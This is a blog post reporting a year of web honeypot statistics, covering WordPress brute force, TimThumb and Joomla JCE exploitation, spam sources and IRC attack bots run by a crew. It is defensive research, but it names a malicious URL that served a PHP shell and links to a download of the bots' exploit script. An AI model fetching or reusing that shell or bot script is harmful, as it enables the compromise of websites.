[en] A year of Web Attacks

My Web Honeypot reach the first year, so i decide to write a sumary with some statistics.

Some informations about this Web Honeypot.
The address : http://www.malekal.com/modsec/
The attacks detections are made by modsecyrity module, all the attacks are grabed and injected in a database.
The IPs are blacklisted for one hour.

General informations

Below a screenshot of the attacks per day.
The peak are big WordPress Bruteforce Attack.
The last increase are du to a better detections for spam and a Joomla JCE Attacks campaign

year_webattacks2

 

year_webattacks

So, from 2014-09-13 to 2014-09-13 we got a total of 21516 attacks and :

  • 10262 WordPress Bruteforce attacks
  • 1405 WordPress TimThumb Attacks
  • 2132 Joomla JCE Attacks
  • 5401 Spam attacks – and it miss a lot

First surprise, my website is a WordPress and i got more Joomla Attacks than WordPress TimThumb.
Not so much ShellShock scan.

year_webattacks3

Not mentionned but also 52 PHP exploits attacks used to spread BossaBot sometimes ago.

hack_attempt

About netname

CHINANET is far to be the first netname as the source and the second is OVH.

Capture du 2014-10-16 19:36:08

OVH moved after the Nuclear Pack story  and some tweets.
We can see a decrease around february 2014.

Capture du 2014-10-16 19:45:42

Spam Attacks

Most of the Spam attacks are spam comments on my WordPress.

China is far to be the first source with 73.6% : http://www.malekal.com/modsec/graph_categories.php?t=1&a=spam
The second is Ukrainia 16.4%

Spam_China_source

As you can see, CHINANET-FJ is the first netname with 56.9%, the second netname is UNICOM-FJ6PUTIAN-MAN (15,7%)
Blocking this netname will probably reduce the spam on your blog.
Screenshot of the attacks from CHINANET-FJ (the last increase is du to a better spam detection). Around 60 attempts per day.

CHINANET

 

WordPress Timthumb and JCE Joomla

Theses vulnerabilities are exploited to upload PHP Shell or form Upload.

A WordPress Thimthumb attempt : http://www.malekal.com/modsec/index.php?ip=92.46.62.199#305934 – remote URL is  flickr.com.hotelkouris.gr/xp.php and lead to a PHP Shell :

Web_injection3 Web_injection_PHPShellor http://www.malekal.com/modsec/index.php?ip=5.135.143.169#305945  that upload a form upload

Web_injection_FormUpload

 

 

Web_injection4

 

 

 

 

 

 

 

 

 

on the hackers side, there a a lot of bots availaible in some IRCd  to scan for website and exploit severals vulnerabilities.
Example of availaible commands for some bots.
Notice that the bots dont have Shellshock scan.

Bot_help Bot_help2

JCE/TimThumb

   JCE_hack_attempt2 JCE_hack_attempt3 JCE_hack_attempt4

JCE_TimThumb_hack_attempt

Zen Hack

Shop_hack_attempt

Magento Shop Exploit

Shop_hack_attempt2

IRC_hack_attempt

As you can see, most of the attempts are blind and use websearch dork to reach websites.
That can explain why i got more JCE attempt than WordPress, depend of the dork use.
Also a website with a great rank will probably get more attempt that others.
You can find a script of theses bot on this link : http://pjjoint.malekal.com/files.php?read=20141016_k8m6t10y9h6

Most of theses group selling mailer, shell etc, probably from hacked website.

BlackUnix Crew

I came accross a crew that seems to be very active, they call them BlackUnix Crew.

They got some bots to exploit :

 Timthumb_hack_attempt

 

JCE_hack_attempt

Timthumb_hack_attempt2

Blackunix_webattacks

DDoS stuffs :

  Blackunix_irc2

Blackunix_irc3

Defacing :

Blackunix_defacing

Cardings stuffs :

Blackunix_carding

of course, they are more professionnal and discreet group that hit websites depending of extension/CMS etc.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 50 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *